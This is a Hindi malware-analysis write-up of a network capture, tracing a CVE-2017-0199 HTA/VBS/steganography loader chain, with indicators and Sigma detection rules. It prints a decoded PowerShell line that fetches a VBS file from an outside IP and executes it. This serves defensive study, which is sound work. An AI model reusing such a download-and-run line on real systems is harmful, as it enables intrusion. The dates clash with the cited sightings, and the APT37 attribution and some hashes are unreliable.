
CVE-2017-0199 XLS --> HTA --> VBS --> STEGANOGRAPHY --> DBATLOADER/GULOADER शैली का मैलवेयर
PCAP-आधारित विश्लेषण | दिनांक: 2025-03-12 | लेखक: BlackOclock
14.1 पूर्ण आक्रमण श्रृंखला सारांश
14.2 समझौता संकेतक (IP, हैश, डोमेन)
14.3 सिफारिशें
नोट!!! इस विश्लेषण में 'केवल' PCAP फ़ाइल का उपयोग किया गया था! ZIP फ़ाइलों की आवश्यकता नहीं थी;
##1. विश्लेषण अवलोकन

आकृति 1: malware-traffic-analysis.net से डाउनलोड की गई स्रोत फ़ाइलें - 'केवल' PCAP फ़ाइल का उपयोग किया गया\
2025-01-09 (गुरुवार): CVE-2017-0199 XLS --> HTA --> VBS --> स्टेग्नोग्राफ़ी --> DBATLOADER/GULOADER शैली का मैलवेयर
##2. नेटवर्क ट्रैफ़िक विश्लेषण
2.1-प्रोटोकॉल पदानुक्रम – बड़ा चित्र

मैंने ट्रैफ़िक का एक बड़ा चित्र प्राप्त करने के लिए प्रोटोकॉल पदानुक्रम से शुरुआत की। यह प्रत्येक उपयोग किए गए प्रोटोकॉल की मात्रा दर्शाता है। जैसा कि चित्र में दिखाया गया है, TLS सभी ट्रैफ़िक का 82.4% हिस्सा है। इसके अतिरिक्त, मीडिया लाइन और लाइन-आधारित डेटा भी मौजूद है। हालाँकि, नेटवर्क गतिविधि को बेहतर ढंग से समझने के लिए, हमें वार्तालाप और एंडपॉइंट की जाँच करने की आवश्यकता है।
2.2-वार्तालाप – शीर्ष वार्ताकार और डेटा स्थानांतरण

हम उन IP जोड़ियों का पता लगाने के लिए वार्तालाप का उपयोग करते हैं जिनके बीच सबसे अधिक डेटा स्थानांतरण होता है। विश्लेषण से पता चलता है कि 10.9.1.101 (होस्ट) और 104.17.201.1 के बीच सबसे अधिक ट्रैफ़िक वॉल्यूम है। इस डेटा स्थानांतरण के लिए पोर्ट 80 और 443 का उपयोग किया गया। इसके अतिरिक्त, हम देखते हैं कि 104.17.201.1 से 10.9.1.101 (होस्ट) को 3 MB डेटा स्थानांतरित किया गया। एक और महत्वपूर्ण निष्कर्ष WAN IP (89.39.83.184) से कनेक्शन के कारण पोर्ट 21 पर कनेक्शन है, जो संभावित एक्सफ़िल्ट्रेशन का संकेत देता है। लेकिन हम अभी निश्चित नहीं हैं, क्योंकि हम इसके बारे में अभी तक नहीं जानते हैं। हमें एक प्रमाण चाहिए!
2.3- एंडपॉइंट

हम नेटवर्क पर शीर्ष वार्ताकारों की पहचान करने के लिए एंडपॉइंट का उपयोग करते हैं। 104.17.201.1 में 3MB प्रेषित डेटा (Tx) है और 10.9.1.101 में 3MB प्राप्त डेटा (Rx) है। इसके अतिरिक्त, शीर्ष वार्ताकार स्रोत के रूप में 104.17.201.1 और गंतव्य के रूप में 10.9.1.101 हैं।
2.4- HTTP निर्यात ऑब्जेक्ट

निर्यात का उपयोग नेटवर्क पर स्थानांतरित फ़ाइलों, डेटा, ईमेल आदि की पहचान करने के लिए किया जाता है। हर बार, जब हम pcap का विश्लेषण करते हैं, तो हमें यहाँ जाँच करनी चाहिए कि कौन से पैकेट में कौन सा डेटा है। खैर, हमने 88,132,2457 और 2468 पैकेट नोट किए।
2.5- HTTP कंटेंस फ़िल्टर

यदि नेटवर्क पर http प्रोटोकॉल हैं। तो हमें फ़िल्टर पर png,zip,jpg,jpeg (स्टेग्नोग्राफ़ी) को एक मीडिया के रूप में जाँचना चाहिए, क्योंकि हमलावर अक्सर एंटीवायरस डिटेक्शन को बायपास करने के लिए मीडिया फ़ाइलों पर दुर्भावनापूर्ण कोड का उपयोग करते हैं।
#उदाहरण: http contains ".png" या http contains ".jpg" या http contains ".jpeg" या http contains ".zip"
हम बस देख रहे हैं कि जब नेटवर्क पर 80 पोर्ट का उपयोग किया जाता है तो यह फ़िल्टर क्यों महत्वपूर्ण है। यहाँ एक .hta है जो 47 पैकेट पर मीडिया फ़ाइलों पर भेजा गया था। लेकिन जब हम फ़ाइलों की पहचान करने के लिए निर्यात का उपयोग करते हैं, तो वह नहीं था।
##3. नेटवर्कमाइनर विश्लेषण

हम PCAP पर तेजी से पहचान करने के लिए नेटवर्कमाइनर का उपयोग कर सकते हैं। यदि आप REMnux या Linux सिस्टम का उपयोग करते हैं, तो आप टर्मिनल पर लिख सकते हैं ( networkminer pcap_name )
फ्रेम = 47 फ़ाइलनाम = seemebestthingsevermeetgivenbestthingsfornewways | एक्सटेंशन = .hta | आकार = 47 KB | स्रोत IP = 192.3.27.144 फ्रेम = 132 | फ़ाइलनाम = comonstraints | एक्सटेंशन = .vbs | आकार = 223 KB | स्रोत IP = 107.172.31.5 फ्रेम = 2457 | फ़ाइलनाम = foeMMBIG | एक्सटेंशन = .txt | आकार= 325 KB | स्रोत IP = 107.172.31.5

JA3 हैश:
06843d66057fc9cbe42e9d690308903 (फ्रेम 8)62136a81b5b727d039d8160d188863aa (फ्रेम 14)3c4eb72b882d4d1442c67ce73f1292a9 (फ्रेम 140)JA4 फ़िंगरप्रिंट:
t13d1516h2_8daaf6152771_02713d6af862t13d201000_2b729b4bf63_29829a46703fखैर, लेकिन हमें JA4 और JA3 हैश की आवश्यकता क्यों है? एक प्रश्न हो सकता है कि JA3 और JA4 क्या हैं?
मुझे समझाने दीजिए; JA3 और JA4 TLS हैंडशेक के मापदंडों के आधार पर TLS क्लाइंट और सर्वर को फ़िंगरप्रिंट करने की तकनीकें हैं। JA3 TLS हैंडशेक के क्लाइंट हैलो पैकेट का MD5 हैश बनाता है, जो क्लाइंट एप्लिकेशन (जैसे, ब्राउज़र, मैलवेयर) की विशिष्ट पहचान करता है।
JA4 एक नई तकनीक है। यह इंटरनेट ट्रैफ़िक के लिए एक फ़िंगरप्रिंट की तरह है। जिस तरह मनुष्यों के अद्वितीय फ़िंगरप्रिंट होते हैं, उसी तरह इंटरनेट से जुड़ने वाला प्रत्येक सॉफ़्टवेयर एक अद्वितीय निशान छोड़ता है। C2 सर्वर खोजने में अधिक सहायक।
##4. ZEEK (ZUI) लॉग विश्लेषण
HTTP ट्रैफ़िक से निकाली गई फ़ाइलों को सत्यापित करने के लिए Zeek लॉग का उपयोग किया गया। files.log निम्नलिखित प्रविष्टियाँ दिखाता है:
इन हैश का उपयोग बाद में VirusTotal लुकअप के लिए किया गया।

Hta (seemebestthing…)
MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
##5. निकाली गई फ़ाइलें और स्थैतिक विश्लेषण
यहाँ हम डेस्कटॉप पर pcap से सभी फ़ाइलों का निर्यात करेंगे और हम binwalk के साथ विश्लेषण करेंगे

HTA फ़ाइल साफ दिखती है। मुझे कोई छिपा हुआ डेटा नहीं मिला। यह एक सामान्य टेक्स्ट फ़ाइल प्रतीत होती है।
VBS फ़ाइल अलग है। मुझे इसके अंदर दो चीज़ें मिलीं:
कुछ Base64 डेटा और एक HTML दस्तावेज़ इसका मतलब है कि VBS फ़ाइल में कई परतें हैं। हमलावर ने इसके अंदर कोड छिपाने की कोशिश की।
TXT फ़ाइल ने मुझे एक अजीब आउटपुट दिया। यह "Broadcom header" कहता है, जो एक टेक्स्ट फ़ाइल के लिए समझ में नहीं आता। शायद फ़ाइल टूटी हुई है, या इसके अंदर कोई और परत है। मुझे और अधिक समझने के लिए इसे सैंडबॉक्स में चलाने की आवश्यकता है
##6. ट्रायेज और व्यवहार विश्लेषण
मैंने HTA फ़ाइल को सैंडबॉक्स में चलाया। यहाँ क्या हुआ:

हमारे पास hta का परिणाम है। ट्रायेज द्वारा स्कोर 8/10।

5 चरणों वाली प्रक्रिया श्रृंखला: mshta.exe (PID 1080) शुरू हुआ इसने cmd.exe (4952) लॉन्च किया cmd.exe ने powershell.exe (4424) लॉन्च किया PowerShell ने SeDebugPrivilege सक्षम किया (अन्य प्रक्रियाओं तक पहुँचने के लिए) कोड इंजेक्शन के लिए WriteProcessMemory का कई बार उपयोग किया गया
इंजेक्शन श्रृंखला:
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → अज्ञात प्रक्रिया (3332)
PowerShell ने चल रही प्रक्रियाओं की भी जाँच की (डिस्कवरी) और सिस्टम भाषा को देखा (शायद सैंडबॉक्स से बचने के लिए)।
MITRE तकनीकें जो मैंने hta के लिए देखीं:
T1059.001 (PowerShell) T1059.003 (cmd) T1057 (प्रक्रिया खोज) T1134 (टोकन हेरफेर) T1055 (प्रक्रिया इंजेक्शन) T1614.001 (भाषा पहचान)

खैर हम यहाँ cmd.exe द्वारा PowerShell कमांड में FromString64Base देखते हैं। हमें base64 में कोड देखने के लिए इसे CyberChef पर डिकोड करना होगा।

PowerShell कमांड में, मुझे एक Base64 स्ट्रिंग मिली। CyberChef के साथ इसे डिकोड करने के बाद, मैंने यह देखा:
URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."
इसका मतलब है कि, 107.172.31.5 से comonstraints.vbs डाउनलोड करें और 3 सेकंड सोएं और चलाएं। खैर अगले चरण में comonstraints.vbs डाउनलोड किया जाएगा।

हमारे पास vbs का परिणाम है। ट्रायेज द्वारा स्कोर 10/10।
प्रक्रिया श्रृंखला: Wscript.exe चला और इसने PowerShell.exe लॉन्च किया
खैर चित्र में यदि हम प्रक्रिया में कोड की जाँच करते हैं। हम #x#.GIBMMeof/5.13.271.701//:p##h ----> एक एन्कोडेड पथ है। http://107.172.31.5/foeMMBIG.txt (जो PCAP के निर्यात में देखा गया था)
और यह भी एक साइट https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg, जिसमें jpg के अंदर दुर्भावनापूर्ण कोड है। JPG में <BASE64_START> और <BASE64_END> टैग हैं। उनके बीच, इसका मतलब है कि छिपा हुआ कोड है। छिपा हुआ टेक्स्ट वास्तव में Base64 है लेकिन उल्टा लिखा गया है। स्क्रिप्ट पहले इसे उलटता है, फिर इसे डिकोड करता है। डिकोड करने के बाद, यह एक छोटा प्रोग्राम (.NET असेंबली) बन जाता है और कंप्यूटर पर चलता है।
मैंने jpg डाउनलोड करने की कोशिश की।

लेकिन मैं इसे प्राप्त नहीं कर सका। शायद यह पता बंद कर दिया गया था। VBS फ़ाइल एक चित्र डाउनलोड करती है, उसके अंदर छिपा हुआ कोड ढूंढती है, उसे ठीक करती है, और चलाती है। इसे स्टेग्नोग्राफ़ी कहा जाता है – छवियों के अंदर चीज़ों को छिपाना।
MITRE तकनीकें:
T1012 - Query Registry T1082 - System Information Discovery T1055 - Process Injection T1057 – Process Discovery T1134 – Access Token Manipulation

यह पुष्टि करता है कि foeMMBIG.txt वास्तव में एक रैनसमवेयर ड्रॉपर है।
MITRE तकनीकें:
##7. प्रक्रिया इंजेक्शन विश्लेषण
7.1 प्रक्रिया वृक्ष
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)
7.2 WriteProcessMemory घटनाएँ
PID 1080 (mshta.exe) ने PID 4952 (cmd.exe) को लिखा PID 4952 (cmd.exe) ने PID 4424 (powershell.exe) को लिखा PID 4424 (powershell.exe) ने PID 4432 (csc.exe) को लिखा PID 4432 (csc.exe) ने PID 3332 (अज्ञात) को लिखा
7.3 टोकन हेरफेर
PowerShell (PID 4424) ने SeDebugPrivilege को सक्षम किया, जिससे यह अन्य प्रक्रियाओं तक पहुँच सके।
##8. मेमोरी डंप विश्लेषण
जब मैलवेयर चला, तो सैंडबॉक्स ने PowerShell (PID 4424) के मेमोरी स्नैपशॉट लिए। ये स्नैपशॉट उस समय कंप्यूटर की RAM में जो कुछ था उसे सहेजते हैं।
मुझे 20 से अधिक मेमोरी डंप फ़ाइलें मिलीं

VBS फ़ाइल (WScript.exe, PID 1184 द्वारा चलाई गई) ने भी मेमोरी डंप बनाए। ये डंप ज्यादातर 64 KB आकार के होते हैं। यह छोटे आवंटन के लिए सामान्य है। लेकिन मैंने Notepad.exe (PID 4600) के मेमोरी डंप की जाँच की, लेकिन कोई नहीं था। यह दिलचस्प है क्योंकि हम जानते हैं कि Notepad का उपयोग foeMMBIG.txt खोलने के लिए किया गया था।
##9. C2 पहचान और फ़िंगरप्रिंटिंग

केवल 2 IP से Jarm मुद्रित होता है
मैंने NetworkMiner से JA4 फ़िंगरप्रिंट निकाले और GreyNoise में उन्हें खोजा। मुझे उसी JA4 फ़िंगरप्रिंट के साथ 26 IP मिले जो दुर्भावनापूर्ण के रूप में चिह्नित थे। फिर मैंने उनके खुले पोर्ट और सेवाओं की जाँच करने के लिए Shodan में इन सभी IP को खोजा।
यह सूची GreyNoise की जाँच करके बनाई गई थी, और ये IP GreyNoise में दुर्भावनापूर्ण के रूप में चिह्नित हैं:
34.122.147.229 ( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 7 महीने पहले यह IP 2 अलग-अलग हमले प्रकारों में 1222 घटनाओं में शामिल था। हमले: tcp-portscan (1177), fortinet-login (45)। पहली बार देखा गया: 2024-05-07 23:10 UTC, अंतिम बार देखा गया: 2025-07-17 17:28 UTC। 3/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया। Not After: 2020-11-30 22:10:40 )
107.189.1.175 - shodan का परिणाम C: लक्ज़मबर्ग Org : Buy VM खुले पोर्ट: 80 / 443 / 9001 / 9030
104.197.69.115( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 5 महीने पहले यह IP 2 अलग-अलग हमले प्रकारों में 1159 घटनाओं में शामिल था। हमले: tcp-portscan (1124), fortinet-login (35)। पहली बार देखा गया: 2024-07-11 04:26 UTC, अंतिम बार देखा गया: 2025-09-25 12:08 UTC। 4/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया )
34.72.176.129 ( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 5 महीने पहले
यह IP 2 अलग-अलग हमले प्रकारों में 1233 घटनाओं में शामिल था। हमले: tcp-portscan (1201), fortinet-login (32)। पहली बार देखा गया: 2024-07-11 04:26 UTC, अंतिम बार देखा गया: 2025-09-25 12:12 UTC।
CrowdSec CTI पर अधिक जानकारी प्राप्त करें - स्रोत CrowdSec के अनुसार - 1 वर्ष पहले
व्यवहार: शोषण प्रयास / HTTP ब्रूटफोर्स / HTTP क्रॉल + 2 और। CrowdSec CTI पर पूर्ण विवरण
6/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया
34.123.170.104 ( वेब एप्लिकेशन ब्रूट-फोर्स लॉगिन प्रयास - स्रोत Guardpot के अनुसार - 1 महीना पहले यह IP 3 अलग-अलग हमले प्रकारों में 1141 घटनाओं में शामिल था। हमले: tcp-portscan (1097), fortinet-login (42), web-login (2)। पहली बार देखा गया: 2024-05-23 14:07 UTC, अंतिम बार देखा गया: 2026-01-26 05:22 UTC। CrowdSec CTI पर अधिक जानकारी प्राप्त करें - स्रोत CrowdSec के अनुसार - 1 वर्ष पहले व्यवहार: HTTP क्रॉल / HTTP DoS / HTTP शोषण + 1 और। CrowdSec CTI पर पूर्ण विवरण ) 3/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया
121.127.42.69 ( 3/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया)
185.220.101.2 shodan का परिणाम ( होस्टनाम:berlin01.tor-exit.artikel10.org देश : जर्मन संगठन: Artikel10 e.V. ISP : Stiftung Erneuerbare Freiheit (यह TOR है) पोर्ट : 80/443/9001/9002
185.220.101.162 ( होस्टनाम: tor-exit-162.relayon.org देश : जर्मन / संगठन:CIA TRIAD SECURITY LLC ISP : Stiftung Erneuerbare Freiheit)
205.169.39.24 नेटवर्क पोर्ट स्कैनिंग और टोही - स्रोत Guardpot के अनुसार - 8 महीने पहले यह IP 1 हमले प्रकार में 86 घटनाओं में शामिल था। हमले: tcp-portscan (86)। पहली बार देखा गया: 2024-08-22 22:29 UTC, अंतिम बार देखा गया: 2025-07-04 17:29 UTC।
47.254.76.66 ( क्लाउड प्रदाता : Alibaba Cloud देश : USA खुले पोर्ट : 22 ऑपरेटिंग सिस्टम : Linux
47.251.118.89 (क्लाउड प्रदाता : Alibaba Cloud देश : USA खुले पोर्ट : 22 ऑपरेटिंग सिस्टम : Linux)
107.189.12.7( होस्टनाम : tor.privatebrowsing.org देश लक्ज़मबर्ग खुले पोर्ट: 80)
47.88.18.245 ( देश USA ओएस: Linux खुला पोर्ट : 22)
79.127.248.2 ( 4/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया देश Us)
185.126.82.201( देश : USA पोर्ट : 1080)
45.92.19.139 (देश : USA पोर्ट : 59511)
47.251.186.126( देश : USA पोर्ट : 22)
79.127.221.66 (देश : USA पोर्ट : 1080)
185.241.208.136 ( देश: Poland होस्टनाम ns2.rdp.rs खुले पोर्ट : 111/8440/9001)
47.89.246.29 ( देश : USA पोर्ट : 22)
185.220.101.110 ( होस्टनाम: tor-exit-110.digitalcourage.de खुले पोर्ट : 80/123/443/8080)
5.77.252.202 ( होस्टनाम :host-202.252.77.5.ucom.am देश : Armenia खुले पोर्ट : 1701/8291)
124.198.132.172(Tor) ( देश : USA खुले पोर्ट : 111/8110/9001)
185.220.101.9 (Tor) ( होस्टनाम : berlin01.tor-exit.artikel10.org देश : Poland खुले पोर्ट : 80/443/9001/9002)
213.230.93.13 ( 4/94 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया देश : uzbekishtan)
138.199.140.203 ( होस्टनाम :static.203.140.199.138.clients.your-server.de देश : German खुले पोर्ट : 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)
##10. एक्सफ़िल्ट्रेशन विश्लेषण
जब हम 89.39.83.184 की जाँच करते हैं, तो हम देखते हैं कि ip का होस्ट के साथ 21 पोर्ट पर कनेक्शन है। यदि हम 21 ftp पर किसी पैकेट पर क्लिक करते हैं और Follow --- > TCP STREAM, तो हम हमलावर का ईमेल और पासवर्ड देखते हैं

जब हम नेटवर्कमाइनर पर फ़ाइलों की जाँच करते हैं, तो वहाँ 2498(PW_user1_DESKTOP.html) और 2516(Contacts_Thunder.txt) पैकेट संख्या थी। उन फ़ाइलों का निर्यात करने के बाद और फ़िशिंग हमले (मेरा अनुमान) या खातों की चोरी के लिए उपयोगकर्ता नाम और पासवर्ड की जानकारी होती है।

मैंने हमलावर के बुनियादी ढाँचे के बारे में अधिक जानने के लिए Shodan पर FTP सर्वर IP (89.39.83.184) खोजा।

##12. खतरा खुफिया
12.1 VirusTotal और MalwareBazaar परिणाम
Zeek लॉग (धारा 4) से प्राप्त हैश की VirusTotal और MalwareBazaar पर जाँच की गई। सभी फ़ाइलों को दुर्भावनापूर्ण पुष्टि की गई:
HTA फ़ाइल: 33/61 डिटेक्शन, AgentTesla के रूप में पहचाना गया VBS फ़ाइल: 31/62 डिटेक्शन, AgentTesla / Talu के रूप में पहचाना गया TXT फ़ाइल: 25/62 डिटेक्शन, Zapchast / Bhgd (रैनसमवेयर ड्रॉपर) के रूप में पहचाना गया
पूर्ण हैश सूची के लिए धारा 14.2 देखें।
12.2 MITRE ATT&CK मैपिंग
T1059.001 - PowerShell T1059.003 - cmd T1134 - टोकन हेरफेर T1614.001 - भाषा पहचान T1012 - Query Registry T1082 - System Information Discovery T1055 - Process Injection T1057 – Process Discovery
12.3 APT37 (ScarCruft) सहसंबंध
यह हमला APT37 जैसा क्यों दिखता है?
हमने इस हमले में क्या देखा - APT37 किसके लिए जाना जाता है संक्रमण शुरू करने के लिए HTA फ़ाइल का उपयोग किया गया - APT37 HTA फ़ाइलों का बहुत उपयोग करता है base64 कमांड के साथ PowerShell - APT37 PowerShell पसंद करता है स्टेग्नोग्राफ़ी (JPG जिसमें छिपा हुआ कोड है) - APT37 चित्रों में कोड छुपाता है प्रक्रिया इंजेक्शन (mshta → cmd → powershell → csc) - APT37 विश्वसनीय प्रक्रियाओं में कोड इंजेक्ट करता है चुराए गए डेटा का FTP एक्सफ़िल्ट्रेशन - APT37 क्रेडेंशियल और फ़ाइलें चुराता है अंत में रैनसमवेयर - APT37 अब रैनसमवेयर का भी उपयोग करता है लक्ष्य शायद यूरोप में - APT37 यूरोप में सक्रिय है निष्कर्ष इस हमले में हमने जो तकनीकें देखीं, वे APT37 के सामान्य व्यवहार से मेल खाती हैं। यह 100% प्रमाण नहीं है, लेकिन यह APT37 जैसा दिखता है। एक उत्तर कोरियाई हैकर समूह संभवतः इसके पीछे है।
##13. डिटेक्शन इंजीनियरिंग
title: PowerShell में SeDebugPrivilege description: SeDebugPrivilege सक्षम करने वाले PowerShell का पता लगाता है (संभावित टोकन हेरफेर) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection
title: FTP एक्सफ़िल्ट्रेशन description: ऐसी प्रक्रियाओं से FTP कनेक्शन का पता लगाता है जिन्हें FTP का उपयोग नहीं करना चाहिए logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: PowerShell डाउनलोड description: इंटरनेट से फ़ाइलें डाउनलोड करने वाले पावरशेल का पता लगाता है logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection
title: Temp से Notepad description: Temp फ़ोल्डर से फ़ाइलें खोलने वाले नोटपैड का पता लगाता है (संभावित प्रक्रिया इंजेक्शन) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection
नोट! मुझे पता है कि यह बुनियादी है, लेकिन मैं सिर्फ सिग्मा-नियम सीखने की कोशिश कर रहा हूँ।
##14. निष्कर्ष और आईओसी (IOCs)
14.1 पूर्ण हमला श्रृंखला सारांश
संक्रमण एक दुर्भावनापूर्ण HTA फ़ाइल से शुरू हुआ जो 192.3.27.144 से डाउनलोड की गई थी। इसे खोलने पर प्रक्रियाओं की एक श्रृंखला शुरू हुई:
mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe
प्रमुख निष्कर्ष:
<BASE64_START> और <BASE64_END> टैग के बीच छिपा हुआ Base64 डेटा था।
स्क्रिप्ट ने इस डेटा को निकाला, इसे उलटा (reversed), और एक .NET असेंबली में डिकोड किया। यह असेंबली मेमोरी में लोड की गई और निष्पादित की गई। यद्यपि हम JPG डाउनलोड नहीं कर सके (401 त्रुटि), कोड दृढ़ता से सुझाव देता है कि यह वही तंत्र था जिसने अंतिम पेलोड (foeMMBIG.txt) डाउनलोड किया।धमकी देने वाला कलाकार: APT37 – तकनीकें ज्ञात TTPs से मेल खाती हैं
14.2 समझौता संकेतक (Indicators of Compromise)
IP पते:
IP = 107.172.31.5 | भूमिका = C2 सर्वर (VBS, TXT डाउनलोड) IP = 89.39.83.184 | भूमिका = FTP एक्सफ़िल्ट्रेशन सर्वर IP = 192.3.27.144 | भूमिका = HTA डाउनलोड स्रोत IP = 104.17.201.1 | भूमिका = पहले चरण का डाउनलोड (3 MB) GreyNoise से 25 दुर्भावनापूर्ण IP | पूरी सूची के लिए धारा 9.2 देखें
डोमेन:
डोमेन = res.cloudinary.com भूमिका = स्टेग्नोग्राफ़ी (छिपे हुए कोड वाला JPG) डोमेन = ip-api.com फ़ाइल नाम = index.B23BDC8E.txt(गलत) भूमिका = सैंडबॉक्स चोरी जांच
फ़ाइल हैश:
(seemebestthing…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63
comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882
foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
FTP क्रेडेंशियल्स:
14.3 सिफारिशें